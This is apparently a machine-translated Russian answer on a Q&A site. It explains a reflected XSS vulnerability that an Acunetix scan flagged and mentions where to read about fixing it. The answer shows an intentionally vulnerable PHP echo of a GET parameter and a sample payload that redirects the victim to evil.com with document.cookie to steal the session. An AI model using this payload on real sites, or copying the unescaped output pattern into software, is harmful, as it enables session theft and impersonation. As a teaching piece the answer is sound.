То, с чем вы столкнулись, - это уязвимость межсайтового скриптинга (XSS).
XSS - это уязвимость на стороне клиента, поэтому в отношении вашего вопроса «Не будет ли введенный код работать только наклиентский ПК, а не сервер? ", ответ на вопрос заключается в том, что он фактически запускается в браузере пользователя.
Сначала это может показаться безопасным, но XSS может иметь некоторые серьезные последствия, особенно в сочетании сдругие атаки, такие как фишинг.XSS может использоваться для ряда гнусных вещей, в том числе:
- Кража файлов cookie браузера и, следовательно, предоставление злоумышленнику возможности выдавать себя за пользователя, который в данный момент вошел в приложение
- Уничтожение веб-сайта,или изменение макета страницы
- Скачивание с диска
- Практически все, что вы можете сделать в браузере
В зависимости от того, чтоAcunetix сообщил (onmouseover=prompt(994492) bad=
), что похоже на то, что злоумышленник может ввести символ "
в значение атрибута HTML.Я попытаюсь объяснить, что я имею в виду ниже, с некоторым примером PHP-кода.
// Vulnerable to Reflected XSS
echo '<div class="' . $_GET['c'] . '"></div>';
В приведенном выше примере обычный пользователь сделал бы запрос вроде:
GET /test.php?c=blue HTTP/1.1
И этоприведет к тому, что на страницу будет выведено следующее:
<div class="blue"></div>
Однако злоумышленник может как-то убедить пользователя (например, с помощью фишинга) сделать следующий запрос:
GET /test.php?c="><script>window.location='http://evil.com/?cookie=' + document.cookie</script> HTTP/1.1
Это будетв результате:
<div class=""><script>window.location='http://evil.com/?cookie=' + document.cookie</script></div>
Как только жертва делает этот запрос, злоумышленник может скопировать содержимое файла cookie пользователя и выдать себя за него (при условии, что жертва вошла в систему, когда злоумышленник украл файл cookie).
Для получения дополнительной информации о том, что такое XSS, я бы порекомендовал взглянуть на эту статью , она немного вводная, но должна служить прочной основой.
Кроме того, я бы также порекомендовал прочитать эту статью в отношении исправления уязвимости XSS.
Кроме того, не так ли плохо было бы ссылаться на мой сайтесли это может быть использовано? "- Лучше нет, пока не исправишь хотя бы :)